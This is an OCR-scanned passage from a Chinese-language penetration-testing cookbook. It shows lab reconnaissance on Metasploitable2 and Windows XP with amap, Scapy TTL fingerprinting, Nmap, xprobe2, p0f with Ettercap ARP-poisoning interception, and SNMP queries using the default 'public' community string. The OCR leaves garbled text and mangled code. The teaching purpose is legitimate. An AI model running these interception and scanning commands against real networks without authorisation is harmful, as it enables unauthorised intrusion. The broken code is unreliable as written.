Pd 2.3.4)\r\n530 Please login with USER and PASS.\r\n 
Protocol on 172.16.36.135:22/tcp matches ssh - banner: SSH-2.0- 
OpenSSH_4.7p1 Debian-8ubuntui^n 
Protocol on 172.16.36.135:22/tcp matches ssh-openssh - banner: 
SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntui^n 
Protocol on 172.16.36.135:25/tcp matches smtp - banner: 220 met 
asploitable.localdomain ESMTP Postfix (Ubuntu)\r\n221 2.7.0 Err 
or I can break rules, too. Goodbye.\r\n 
Protocol on 172.16.36.135:23/tcp matches telnet - banner: #' 
Protocol on 172.16.36.135:80/tcp matches http - banner: HTTP/1.1 
200 OK\r\nDate Sat, 26 Oct 2013 014818 GMT\r\nServer Apache/2. 
2.8 (Ubuntu) DAV/2NrNnX-Powered-By PHP/5.2.4-2ubuntu5.10\r\nCon 
tent- Length 891\r\nConnection close\r\nContent-Type text/html\ 
r\n\r\n<html><head><title>Metasploitable2 - Linux</title>< 
Protocol on 172.16.36.135:80/tcp matches http-apache-2 - banner: 
HTTP/1.1 200 OK\r\nDate Sat, 26 Oct 2013 014818 GMT\r\nServer 
Apache/2.2.8 (Ubuntu) DAV/2\r\nX-Powered-By PHP/5.2.4- 2ubuntu5 
.10\r\nContent-Length 891\r\nConnection close\r\nContent- Type t 
ext/html\r\n\r\n<html><head><title>Metasploitable2 - Linux</tit 
le>< 
Protocol on 172.16.36.135:53/tcp matches dns - banner: \f 


amap v5.4 finished at 2013-12-19 05:32:23 


服务 识别 会 扫描 大 量 端口 或 者 在 多 有 65536 个 端口 上 执行 复杂 的 扫描 ， 如 果 每 个 服 
务 上 都 探测 了 每 个 可 能 的 签名 ， 这 样 会 花费 大 量 时 间 。 为 了 增加 服务 识别 扫描 的 速 
度 ， 我 们 可 以 使 用 -1 参数 ， 在 匹配 到 特定 特性 签名 之 后 取消 特定 服务 的 分 析 。 


root@KaliLinux:~# amap 172.16.36.135 1-100 -q1 
amap v5.4 (www.thc.org/thc-amap) started at 2013-12-19 05:33:16 
- APPLICATION MAPPING mode 


Protocol on 172.16.36.135:21/tcp matches ftp 

Protocol on 172.16.36.135:22/tcp matches ssh 

Protocol on 172.16.36.135:25/tcp matches smtp 

Protocol on 172.16.36.135:23/tcp matches telnet 
Protocol on 172.16.36.135:80/tcp matches http 

Protocol on 172.16.36.135:80/tcp matches http-apache-2 
Protocol on 172.16.36.135:53/tcp matches dns 


amap v5.4 finished at 2013-12-19 05:33:16 


Amap 服务 识别 的 底层 原理 和 Nmap 相似 。 它 注入 了 一 系列 探测 请 求 ， 来 尝试 请 求 
唯一 的 响应 ， 它 可 以 用 于 识别 运行 在 特定 端口 的 软件 的 版 本 和 服务 。 但 是 ， 要 注意 
的 是 ， 虽 然 Amap 是 个 服务 识别 的 蔡 代 选项 ， 它 并 不 像 Nmap 那样 保持 更 新 和 拥有 
良好 维护 。 所 以 ，Amap 不 太 可 能 产生 可 靠 的 结果 。 


4.8 Scapy 操作 系统 识别 


由 很 多 技术 可 以 用 于 尝试 识别 操作 系统 或 其 它 设备 的 指纹 。 高 效 的 操作 系统 识别 功 
能 非常 健壮 并 且 会 使 用 大 量 的 技术 作为 分 析 因素 。Scapy 可 以 用 于 独立 分 析 任何 此 
类 因素 。 这 个 秘籍 展示 了 如 何 通过 检测 返回 的 TTL 值 ， 使 用 Scapy 执行 OS 识 

别 o 


准备 


为 了 使 用 Scapy 来 识别 TTL 响应 中 的 差异 ， 你 需要 拥有 运行 Linux/Unix 操作 系统 
和 运行 Windows 操作 系统 的 远程 系统 。 提 供 的 例子 使 用 Metasploitable2 和 
Windows XP。 在 本 地 实验 环境 中 配置 系统 的 更 多 信息 请 参考 第 一 章 的 “安装 
Metasploitable2” 和 “安装 Windows Server" 秘 籍 。 


此 外 ， 这 一 节 也 需要 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 “使 用 文本 编辑 器 VIM 
和 Nano" ° 


操作 步骤 


Windows 和 Linux/Unix 操作 系统 拥有 不 同 的 TTL 默认 起 始 值 。 这 个 因素 可 以 用 于 
尝试 识别 操作 系统 的 指纹 。 这 些 值 如 下 : 

操作 系统 TTL 起 始 值 
Windows 128 
Linux/Unix 64 
一 些 基于 Unix 的 系统 会 的 TTL 默认 起 始 值 为 225 。 但 是 ， 出 于 简单 性 考虑 ， 我 们 
会 使 用 所 提供 的 值 作 为 这 个 秘籍 的 前 提 。 为 了 分 析 来 自 远程 系统 的 响应 中 的 TIL? 


我 们 首先 需要 构建 请 求 。 这 里 ， 我 们 使 用 ICMP 回响 请 求 。 为 了 发 送 ICMP 请 求 ， 
我 们 必须 首先 构建 请 求 的 层级 。 我 们 需要 首先 构建 的 是 IP 层 。 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) >>> linux = "17 
2:16:30. 135" 


>>> windows = "172.16.36.134" 
>>> i = IP() 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= ip 
chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = linux 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= ip 
chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 


为 了 构建 请 求 的 IP 层 ， 我 们 应 该 将 IP HHRMA i 变量 。 通 过 调用 display & 
数 ， 我 们 可 以 确认 对 象 的 属性 配置 。 通 常 ， 发 送 和 接受 地 址 都 设 为 回 送 地 

dE 127.0.0.1 ， 所 以 我 们 需要 将 其 改 为 目标 地 址 的 值 ， 将 i.dst PS AA E 
扫描 的 地 址 的 字符 串 值 。 


通过 再 次 调用 display 函数 ， 我 们 可 以 看 到 不 仅仅 目标 地 址 被 更 新 ，Scapy 也 会 
将 源 IP 地 址 自动 更 新 为 何 默认 接口 相关 的 地 址 。 现 在 我 们 成 功 构造 了 请 求 的 |P 
层 。 既 然 我 们 构建 了 请 求 的 IP 层 ， 我 们 应 该 开始 构建 ICMP 层 了 。 


>>> ping = ICMP() 
>>> ping.display() 
###[ ICMP ]### 
type= echo-request 
code= 0 
chksum= None 
id= 0x0 
seq= 0x0 


为 了 构建 请 求 的 ICMP 层 ， 我 们 会 使 用 和 IP 层 相 同 的 技巧 。 在 提供 

T» ICMP x RIM ping i& 遍历 。 像 之 前 那样 ， 默 认 的 配置 可 以 用 过 

用 dispaly 函数 来 确认 。 通 常 ICMP 类 型 已 经 设 为 了 echo-request ° eee 
432 1 IP fe ICMP 层 ， 我 们 需要 通过 党 放 这 些 层 来 构建 请 求 。 


>>> request = (i/ping) 
>>> request.display() 
###[ IP ]### 

version= 4 


ihl- None 
tos- 0x0 
len- None 
id- 1 
flags- 
frag- 0 
ttl- 64 


proto- icmp 
chksum- None 
src= 172.16.36.180 
dst- 172.16.36.135 
\options\ 

###[ ICMP ]### 
type= echo-request 
code= 0 
chksum= None 
id= 0x0 
seq- 0x0 


IP fe ICMP Æ T A38 3:3: AERE T F6 3585 3 ER o OE SEVA ZR GT E >? CRRA 
MAE: 个 请 求 。 aa sree mS 
毕 ， 我 么 可 以 将 其 传递 给 sra HR METITA o 


>>> ans = sri(request) 
Begin emission: 
Sear tat aoe ee ate ah teed at Finished to send 1 packets. 


Received 25 packets, got 1 answers, remaining 0 packets 
>>> ans.display() 
###[ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 28 
id- 64067 
flags- 
frag- OL 
ttl- 64 
proto- icmp 
chksum- Oxdf41 
Src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 
###[ ICMP ]### 
type= echo-reply 
code= 0 
chksum- Oxffff 
id- 0x0 
seq- 0x0 
###[ Padding ]### 
load-  'Nx00Nx0O0Nx0ONXOONXOONXOONXOONXOONXOONXOONXOONXOONXOO 
NX00NX00NX00N. x00\x00' 


相同 的 请 求 可 以 不 通过 独立 构建 和 党 放 每 一 层 来 构建 。 反 之 ， 我 们 可 以 使 用 单行 
命令 ， 通 过 直接 调用 函数 并 传递 合适 参数 : 


>>> ans = sri(IP(dst-linux)/ICMP()) 
.Begin emission: 
...*Finished to send 1 packets. 


Received 5 packets, got 1 answers, remaining © packets 

>>> ans 

«IP version-4L ihl-5L tos=0x0 len-28 id=64068 flags= frag-OL t 
tl-64 proto-icmp chksum=0xdf40 src-172.16.36.135 dst=172.16.36. 
180 options-[] |«ICMP type=echo-reply code=0 chksum=0xffff id= 
0x0 seq=0x0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x 
OO\XOO\XOO\XOO\xXOO\XOO\xXOO NX0ONXOONXxXOO'! | >>> 


要 注意 来 自 Linux 系统 的 响应 的 TTL 值 为 64。 同 一 测试 可 以 对 Windows 系统 的 
IP 地 址 执行 ， 我 们 应 该 注意 到 响应 中 TTL 值 的 差异 。 


的 


>>> ans = sri(IP(dst=windows )/ICMP() ) 
.Begin emission: 
pi Finished to send 1 packets. 


Received 12 packets, got 1 answers, remaining 0 packets 

>>> ans 

«IP version-4L ihl-5L tos=0x0 len-28 id-24714 flags= frag-OL t 
tl-128 proto-icmp chksum=0x38fc src-172.16.36.134 dst=172.16.36 
.180 options-[] |«ICMP type=echo-reply code=0 chksum=0xffff id 
-0x0 seq=0x0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\ 
X00NX00NX0O0NX0O0ONXOO0NXOONXOO \xOO\xOO\x00' | >>> 


要 注意 由 Windows 系统 返回 的 响应 的 TTL 为 128。 这 个 响应 可 以 轻易 在 Python 
中 测试 : 


root@KaliLinux:~# python Python 2.7.3 (default, Jan 2 2013, 16: 
53:07) 

[GCC 4.7.2] on linux2 

Type "help", "copyright", "credits" or "license" for more infor 
mation. 

>>> from scapy.all import * 

WARNING: No route found for IPv6 destination :: (no default rou 
te?) 

>>> ans = sri(IP(dst="172.16.36.135")/ICMP()) 

.Begin emission: 

ge A m Ar he Finished to send 1 packets. 


Received 18 packets, got 1 answers, remaining 0 packets 
>>> if int(ans[IP].ttl) <= 64: 
print "Host is Linux" 
else: 
print "Host is Windows" 
Host is Linux 
>>> ans = sri(IP(dst="172.16.36.134")/ICMP()) 
.Begin emission: 
erty carte Finished to send 1 packets. 


Received 13 packets, got 1 answers, remaining 0 packets 
>>> if int(ans[IP].ttl) <= 64: 
print "Host is Linux" 
else: 
print "Host is Windows" 
Host is Windows 


通过 发 送 相 同 请 求 ， 可 以 测试 TTL 值 的 相等 性 来 判断 是 否 小 于 等 于 64。 这 里 ， 我 
们 可 以 假设 设备 运行 Linux/Unix 操作 系统 。 否 则 ， 如 果 值 大 于 64， 我 们 可 以 假设 
设备 可 能 运行 Windows 操作 系统 。 整 个 过 程 可 以 使 用 Python 可 执行 脚本 来 自动 
化 : 


#!/usr/bin/python 


from scapy.all 

import * import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
import sys 


if len(sys.argv) !- 2: 

print "Usage - ./ttl id.py [IP Address]" 

print “Example = tti idapy 10:0. 09:5" 

print "Example will perform ttl analysis to attempt to deter 
mine whether the system is Windows or Linux/Unix" 

sys.exit() 


ip = sys.argv[i] 


ans = sri(IP(dst=str(ip))/ICMP(), timeout=1, verbose=0) 
if ans == None: 
print "No response was returned" 
elif int(ans[IP].ttl) <= 64: 
print “Host is Linux/Unix" 
else: 
print "Host is Windows" 


这 个 Python 脚本 接受 单个 参数 ， 由 被 扫描 的 IP 地 址 组 成 。 基 于 返回 的 响应 中 的 
TTL， 脚 本 会 猜测 远程 系统 。 这 个 脚本 可 以 通过 使 用 chmod. 修改 文件 许可 ， 并 且 
直接 从 所 在 目标 调用 来 执行 : 


root@KaliLinux:~# chmod 777 ttl id.py 

root@KaliLinux:~# ./ttl id.py 

Usage - ./ttl id.py [IP Address] 

Example - ./ttl id.py 10.0.0.5 

Example will perform ttl analysis to attempt to determine whethe 
r the system is Windows or Linux/Unix 

root@KaliLinux:~# ./ttl id.py 172.16.36.134 Host is Windows 
root@KaliLinux:~# ./ttl id.py 172.16.36.135 Host is Linux/Unix 


工作 原理 


Windows 操作 系统 的 网 络 流量 的 TTL 起 始 值 通常 为 128， 然 而 Linux/Unix 操作 系 
统 为 64。 通 过 假设 不 高 于 64 应 该 为 其 中 一 种 系统 ， 我 们 可 以 安全 地 假设 Windows 
系统 的 回复 中 TTL 65 到 128， 而 Linux/Unix 系统 的 回复 中 TTL 7 1 $164» 3 
扫描 系统 和 远程 目标 之 间 存 在 设备 ， 并 且 设 备 拦截 请 求 并 重新 封包 的 时 候 ， 这 个 识 
别 方式 就 会 失效 。 


4.9 Nmap 操作 系统 识别 


虽然 TTL ， 别 远程 操作 系统 ， 采 用 更 复杂 的 解法 也 是 很 重要 的 。Nmap 
拥有 操作 系统 识别 功能 ， 它 不 仅仅 是 简单 的 TTL 分 析 。 这 个 秘籍 展示 了 如 何 使 用 
Nmap ， TTL 系统 识别 。 


准备 


为 了 使 用 Nmap 来 执行 操作 系统 识别 ， 你 需要 拥有 运行 Linux/Unix 操作 系统 和 运 
行 Windows 操作 系统 的 远程 系统 RE ron 子 使 用 Metasplotable2 fe Windows 
XP 。 在 本 地 实验 环境 中 配置 系统 的 更 多 信息 请 参考 第 一 章 的 “安装 
Metasploitable2” 和 “安装 Windows Server" 秘籍 。 


操作 步骤 


为 了 执行 Nmap 操作 系统 识别 ，Nmap 应 该 使 用 -o 选项 并 指定 IP 地 址 来 调用 : 


root@KaliLinux:~# nmap 172.16.36.134 -0 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-19 10:59 EST 
Nmap scan report for 172.16.36.134 

Host is up (0.00044s latency). 

Not shown: 991 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

135/tcp | open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

4444/tcp open krb524 

8080/tcp open http-proxy 

8081/tcp open blackice-icecap 

15003/tcp open unknown 

15004/tcp open unknown 

MAC Address: 00:0C:29:18:11:FB (VMware) Device type: general pur 
pose 

Running: Microsoft Windows XP|2003 

OS CPE: cpe:/o:microsoft:windows xp::sp2:professional cpe:/o:mi 
crosoft:windows server 2003 

OS details: Microsoft Windows XP Professional SP2 or Windows Se 
rver 2003 Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at 


http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 15.67 seconds 


: iid HYP > Nmap 会 表明 运行 的 操作 系统 或 可 能 提供 一 列 可 能 运行 的 操作 系 
这 里 ，Nmap 表明 远程 操作 系统 是 Windows XP 或 者 Server 2003 ° 


工作 原理 


Nmap 操作 系统 识别 会 发 送 一 系列 复杂 的 探测 请 求 ， 之 后 m T 求 的 响应 ， 来 
尝试 基于 OS 特定 的 签名 和 预期 行为 识别 底层 的 操作 系统 。 此 外 ， 你 可 以 在 操作 系 
统 是 被 的 输出 底部 看 到 ，Nmap 依赖 于 用 户 的 反馈 ， 以 便 确 保 服 务 签 名 保持 可 靠 。 


4.10 xProbe2 操作 系统 识别 


xProbe2 是 个 用 于 识别 远程 操作 系统 的 复杂 工具 。 这 个 秘籍 展示 了 如 何 使 用 
xProbe2 基于 探测 响应 分 析 来 执行 操作 系统 识别 。 


准备 


为 了 使 用 xProbe2 来 执行 操作 系统 识别 ， 你 需要 拥有 运行 Linux/Unix 操作 系统 和 
运行 Windows 操作 系统 的 远程 系统 A 供 的 例子 使 用 Metasploitable2 和 
WIndows cr LR MC (dq 章 的 “安装 
Metasploitable2”" 和 “安装 Windows Server" $54& 


操作 步骤 


为 了 使 用 xProbe2 对 远程 系统 上 执行 操作 系统 是 被 ， 需 要 将 单个 参数 传递 给 程序 ， 
包含 被 扫描 系统 的 IP 地 址 。 


root@KaliLinux:~# xprobe2 172.16.36.135 
Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodorQoOo.nu, ofir@sys- s 
ecurity.com, mederQoOo.nu 


[*] Target is 172.16.36.135 
[*] Loading modules. 
[*] Following modules are loaded: 


[x] [1] ping:icmp ping -  ICMP echo discovery module 

[x] [2] ping:tcp ping -  TCP-based ping discovery module 

[x] [3] ping:udp ping -  UDP-based ping discovery module 

[x] [4] infogather:ttl calc -  TCP and UDP based TTL distance 

calculation 

[x] [5] infogather:portscan -  TCP and UDP PortScanner 

[x] [6] fingerprint:icmp echo - ICMP Echo request fingerprinti 

ng module 

[x] [7] fingerprint:icmp tstamp - ICMP Timestamp request fing 

erprinting module 

[x] [8] fingerprint:icmp amask - ICMP Address mask request fi 

ngerprinting module 

[x] [9] fingerprint:icmp port unreach -  ICMP port unreachable 
fingerprinting module 

[x] [10] fingerprint:tcp hshake - TCP Handshake fingerprinting 
module 

[x] [11] fingerprint:tcp rst - TCP RST fingerprinting module 

[x] [12] fingerprint:smb - SMB fingerprinting module 

[x] [13] fingerprint:snmp -  SNMPv2c fingerprinting module 


[*] 13 modules registered 


Initializing scan engine 


[*] Running scan engine 

[-] ping:tcp ping module: no closed/open TCP ports known on 172 
.16.36.135. Module test failed 

[-] ping:udp ping module: no closed/open UDP ports known on 172 
.16.36.135. Module test failed 

[-] No distance calculation. 172.16.36.135 appears to be dead or 


no ports known 

Host: 172.16.36.135 is up (Guess probability: 5096) 

Target: 172.16.36.135 is alive. Round-Trip Time: 0.00112 sec 
[*] Selected safe Round-Trip Time value is: 0.00225 sec 
fingerprint:tcp hshake Module execution aborted (no open TCP 
ports known) 

[-] fingerprint:smb need either TCP port 139 or 445 to run 

[-] fingerprint:snmp: need UDP port 161 open 

[*] Primary guess: 


[*] Host 172.16.36.135 Running OS: "Linux Kernel 2.4.22" (Guess 
probability: 10096) 

[*] Other guesses: 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .23" (Guess 
probability: 10096) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .21" (Guess 
probability: 100%) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .20" (Guess 
probability: 100%) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .19" (Guess 
probability: 10096) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .24" (Guess 
probability: 100%) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .25" (Guess 
probability: 10096) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .26" (Guess 
probability: 100%) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .27" (Guess 
probability: 10096) 

[*] Host 172.16.36.135 Running OS: "Linux Kernel .28" (Guess 
probability: 10096) 


[*] Cleaning 


up scan engine 
[*] Modules deinitialized 
[*] Execution completed. 


这 个 工具 的 输出 有 些 误导 性 。 输 出 中 有 好 几 种 不 同 的 Linux 内 核 ， 表 明 特 定 操作 系 
AREA 100%。 显 然 ， 这 是 不 对 的 。xProbe2 实际 上 基于 操作 系统 相关 的 签名 的 
百分比 ， 这 些 签名 在 目标 系统 上 被 验证 。 不 幸 的 是 ， 我 们 可 以 在 输出 中 看 出 ， 签 名 
对 于 分 辨 小 版 本 并 不 足够 细致 。 无 论 如 何 ， 这 个 工具 在 识别 目标 操作 系统 中 ， 都 是 
个 有 帮助 的 额外 资源 。 


工作 原理 


xProbe2 服务 识别 的 底层 原理 和 Nmap 7847. © xProbe2 操作 系统 识别 会 发 送 一 系列 
复杂 的 探测 请 求 ， 之 后 分 析 这 些 请 求 的 响应 ， 来 尝试 基于 OS 特定 的 签名 和 预期 行 
为 识别 底层 的 操作 系统 。 


4.11 pOf 被 动 操作 系统 识别 


pOf 是 个 用 于 识别 远程 操作 系统 的 复杂 工具 。 这 个 工具 不 同 于 其 它 工 具 ， 因 为 它 为 
被 动 识别 操作 系统 而 构建 ， 并 不 需要 任何 与 目标 系统 的 直接 交互 。 这 个 秘籍 展示 了 
如 何 使 用 pOf 基于 探测 响应 分 析 来 执行 操作 系统 识别 。 


准备 


为 了 使 用 xProbe2 来 执行 操作 系统 识别 ， 你 需要 拥有 运行 Linux/Unix 操作 系统 和 
运行 Windows 操作 系统 的 远程 系统 。 提 供 的 例子 使 用 Metasploitable2 和 
Windows XP。 在 本 地 实验 环境 中 配置 系统 的 更 多 信息 请 参考 第 一 章 的 “安装 
Metasploitable2” 和 “安装 Windows Server" 秘 籍 。 


操作 步骤 


如 果 你 直接 从 命令 行 执行 p0f， 不 带 任 何 实现 的 环境 配置 ， 你 会 注意 到 它 不 会 提供 
很 多 信息 ， 除 非 你 直接 和 网 络 上 的 一 些 系统 交 互 : 


root@KaliLinux:~# pOf 

pOf - passive os fingerprinting utility, version 2.0.8 (C) M. Za 
lewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com> 

pOf: listening (SYN) on 'ethi', 262 sigs (14 generic, cksum OF1 
F5CA2), rule: 'all'. 


信息 的 缺失 是 一 个 证 据 ， 表 示 不 像 其 他 工具 那样 ，pOf 并 不 主动 探测 设备 来 尝试 判 

断 他 们 的 操作 系统 。 反 之 ， 它 只 会 安静 地 监听 。 我 们 可 以 在 这 里 通过 在 单独 的 终端 
中 运行 Nmap 扫描 来 生成 流量 ， 但 是 这 会 破坏 被 动 OS 识别 的 整个 目的 。 反 之 ， 我 
们 需要 想 出 一 个 方式 ， 将 流量 重 定向 到 我 们 的 本 地 界面 来 分 析 ， 以 便 可 以 被 动 分 析 
它们 。 

Ettercap 为 这 个 目的 提供 了 一 个 杰出 的 方案 ， 它 提供 了 毒化 ARP 缓存 并 创建 

MITM 场景 的 能 力 。 为 了 让 两 个 系统 之 间 的 流量 经 过 我 们 的 本 地 界面 ， 你 需要 对 每 
个 系统 进行 ARP 毒化 。 


root@KaliLinux:~# ettercap -M arp:remote /172.16.36.1/ /172.16. 


36.135/ -T -w dump 


ettercap NG-0.7.4.2 copyright 2001-2005 ALOR & NaGA 


Listening on ethi... (Ethernet) 


eth1 -> 00:0C:29:09:C3:79 172.16.36.180 


255.255.255.0 


SSL dissection needs a valid 'redir command on' script in the e 


tter.conf file 


Privileges dropped to UID 65534 GID 65534... 


28 plugins 

41 protocol dissectors 

56 ports monitored 

7587 mac vendor fingerprint 
1766 tcp OS fingerprint 
2183 known services 


Scanning for merged targets (2 hosts)... 


* |==================================================>| 100.00 96 


2 hosts added to the hosts list... 


ARP poisoning victims: 


GROUP 1 : 172.16.36.1 00:50:56:C0:00:08 


GROUP 2 : 172.16.36.135 00:0C:29:3D:84:32 


Starting Unified sniffing... 


Text only Interface activated... 
Hit 'h' for inline help 


在 提供 的 例子 中 ，Ettercap 在 命令 行 中 执行 。 -M 选项 定义 了 由 arp:remote # 
数 指定 的 模式 。 这 表明 会 执行 ARP 毒化 ， 并 且 会 噢 探 来 自 远程 系统 的 流量 。 开 始 
-T 选项 表明 操作 会 执行 在 整个 文 


和 闭合 针 杠 之 间 的 IP 地 址 表示 被 毒化 的 系统 。 
本 界面 上 ， -w 选项 用 于 指定 用 于 转 储 流量 捕获 的 文件 。 一 旦 


可 以 在 单独 的 终端 中 再 次 执行 p0f。 假 设 两 个 毒化 主机 正在 通信 


MERE € 
Vx . 


尔 简 历 了 MITM * 4% 


， 你 应 该 看 到 如 下 


root@KaliLinux:~# pOf 

pOf - passive os fingerprinting utility, version 2.0.8 (C) M. Za 
lewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com> 

pof: listening (SYN) on 'ethi', 262 sigs (14 generic, cksum OF1 
F5CA2), rule: 'all'. 


up: 700 hrs) 
-» 172.16.36.135:22 (link: ethernet/modem) 


up: 700 hrs) 
-» 172.16.36.135:22 (link: ethernet/modem) 
172.16.36.135:55829 - Linux 2.6 (newer, 1) (up: 199 hrs) 
-» 172.16.36.1:80 (distance 0, link: ethernet/modem) 


up: 700 hrs) 

-» 172.16.36.135:22 (link: ethernet/modem) 
AC+++ Exiting on signal 2 +++ 
[+] Average packet ratio: 0.91 per minute. 


所 有 经 过 pOf 监听 器 的 封包 会 标注 为 UNKOWN 或 者 和 特定 操作 系统 签名 相关 。 一 
BUTT RBM DT > RBA q 关闭 Ettercap 文本 界面 。 


Closing text interface... 
ARP poisoner deactivated. 


RE-ARPing the victims... 
Unified sniffing was stopped. 


工作 原理 
ARP 毒化 涉及 使 用 无 来 由 的 ARP 响应 来 欺骗 受害 者 系统 ， 使 其 将 目标 IP 地 址 与 
MITM 系统 的 MAC 地 址 关联 。MITM 系统 就 会 收 到 被 毒化 系统 的 流量 ， 并 且 将 其 


转发 给 目标 接受 者 。 这 可 以 让 MITM 系统 能 够 嗅 探 所 有 流量 。 通 过 分 析 流 量 中 的 特 
定 行为 和 签名 ，p0f 可 以 识别 设备 的 操作 系统 ， 而 不 需要 直接 探测 响应 。 


4.12 Onesixtyone SNMP 分 析 


Onesixtyone 是 个 SNMP 分 析 工 具 ， 在 UDP 端口 上 执行 SNMP 操作 。 它 是 个 非常 
简单 的 snmp 扫描 器 ， 对 于 任何 指定 的 IP 地址 ， 仅 仅 请 求 系统 描述 。 


准备 
为 了 使 用 Onesixtyone 来 执行 操作 系统 识别 ， 你 需要 拥有 开启 SNMP 并 可 以 探测 


的 远程 系统 。 提 供 的 例子 使 用 Windows XP。 配 置 Windows 系统 的 更 多 信息 请 参 
考 第 一 章 的 “安装 Windows Server" 秘 籍 。 


操作 步骤 


这 个 信息 可 以 用 于 准确 识别 目标 设备 的 操作 系统 指纹 。 为 了 使 用 Onesixtyone * R 
们 可 以 将 目标 IP 地 址 和 团体 字符 串 作 为 参数 传 入 : 


root@KaliLinux:~# onesixtyone 172.16.36.134 public 

Scanning 1 hosts, 1 communities 

172.16.36.134 [public] Hardware: x86 Family 6 Model 58 Stepping 
9 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 
2600 Uniprocessor Free) 


在 这 个 例子 中 ， 团 体 字 符 串 public 用 于 查询 172.16.36.134 设备 的 系统 描述 。 
这 是 多 种 网 络 设备 所 使 用 的 常见 字符 串 之 一 。 正 如 输出 中 显 式 ， 远 程 主机 使 用 表示 
自身 的 描述 字符 串 回复 了 查询 。 


工作 原理 
SNMP 是 个 用 于 管理 网 络 设备 ， 以 及 设备 间 贡 献 信 息 的 协议 。 这 个 协议 的 用 法 通常 
在 企业 网 络 环境 中 十 分 人 必要， 但是， 系统 管理 员 常 常 忘记 修改 默认 的 团体 字符 串 ， 


它 用 于 在 SNMP 设备 之 间 共 享 信息 。 在 这 个 例子 中 ， 可 以 通过 适当 猜测 设备 所 使 
用 的 默认 的 团体 字符 串 来 收集 网 络 设 备 信息 。 


4.13 SNMPwalk SNMP 分 析 


SNMPwalk 是 个 更 加 复杂 的 SNMP 扫描 器 ， 可 以 通过 猜测 SNMP 团体 字符 串 来 收 
集 来 自 设备 的 大 量 信息 。SNMPwalk 循环 遍历 一 系列 请 求 来 收集 来 自 设 备 的 尽 可 能 
多 的 信息 。 


准备 
为 了 使 用 SNMPwalk 来 执行 操作 系统 识别 ， 你 需要 拥有 开启 SNMP 并 可 以 探测 的 


远程 系统 。 提 供 的 例子 使 用 Windows XP。 配 置 Windows 系统 的 更 多 信息 请 参考 
第 一 章 的 “安装 Windows Server" 秘 籍 。 


操作 步骤 


为 了 执行 SNMPwalk， 应 该 将 一 系列 参数 传 给 工具 ， 包 括 被 分 析 系 统 的 IP 地 址 ， 
所 使 用 的 团体 字符 事 ， 以 及 系统 所 使 用 的 SNMP 版 本 : 


root@KaliLinux:~# snmpwalk 172.16.36.134 -c public -v 2c 

1s0.3.6.1.2.1.1.1.0 - STRING: "Hardware: x86 Family 6 Model 58 

Stepping 9 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 
(Build 2600 Uniprocessor Free)" 


USO On be de 12-09 — OLDS 

US Orda bale A oh Pel eae 

iso.3.6.1.2.1.1.3.0 = Timeticks: (56225) 0:09:22.25 

150.3263. 22121 24.0 S01" 

iso.3.6.1.2.1.1.5.0 = STRING: "DEMO-72E8F41CA4" 

USO S20. bee 191-060-8009 00 

iso.3.6.1.2.1.1.7.0 = INTEGER: 76 

iso.3.6.1.2.1.2.1.0 = INTEGER: 2 

150:3:6.1.2-1.2.2.1.1-1 - INTEGERS 4 

16023. 62.221. 222212 = INTEGER: 2 

1s0.3.6.1.2.1.2.2.1.2.1 = Hex-STRING: 4D 53 20 54 43 50 20 4C 6F 
6F 70 62 61 63 6B 20 69 GE 74 65 72 66 61 63 65 00 

1s0.3.6.1.2.1.2.2.1.2.2 - Hex-STRING: 41 4D 44 20 50 43 4E 45 54 
20 46 61 6D 69 6C 79 


为 了 对 开启 SNMP 的 Windows XP 系统 使 用 SNMPwalk， 我 们 使 用 默认 的 团体 字 
4$ public ， 以 及 版 本 2c 。 这 会 生成 大 量 数 据 ， 在 展示 中 已 经 截断 。 要 注 

意 ， 通 常 所 有 被 识别 的 信息 都 在 所 查询 的 IOD 值 后 面 。 这 个 数据 可 以 通过 使 用 管 
连接 到 cut 


root@KaliLinux:~# snmpwalk 172.16.36.134 -c public -v 2c | cut - 
d Wwe Sar 2 

STRING: "Hardware: x86 Family 6 Model 58 Stepping 9 AT/AT COMPAT 
IBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniproces 
sor Free)" 

OIDS ds0:392051 31.01: 91151: S 

Timeticks: (75376) 0:12:33.76 


STRING: "DEMO-72E8F41CA4" 


要 注意 ，SNMPwalk 的 输 了 系 Pen ， 可 以 看 到 一 
些 明显 的 信息 ， 另 一 些 信 息 则 是 模糊 的 。 但 是 ， 通 过 彻底 分 析 它 ， 你 可 以 收集 到 目 
标 系 统 的 大 量 信 息 : 


Hex-STRING: 00 50 56 FF 2A 8E 
Hex-STRING: 00 OC 29 09 C3 79 
Hex-STRING: 00 50 56 FO EE E8 
IpAddress: 172.16.36.2 
IpAddress: 172.16.36.180 
IpAddress: 172.16.36.254 


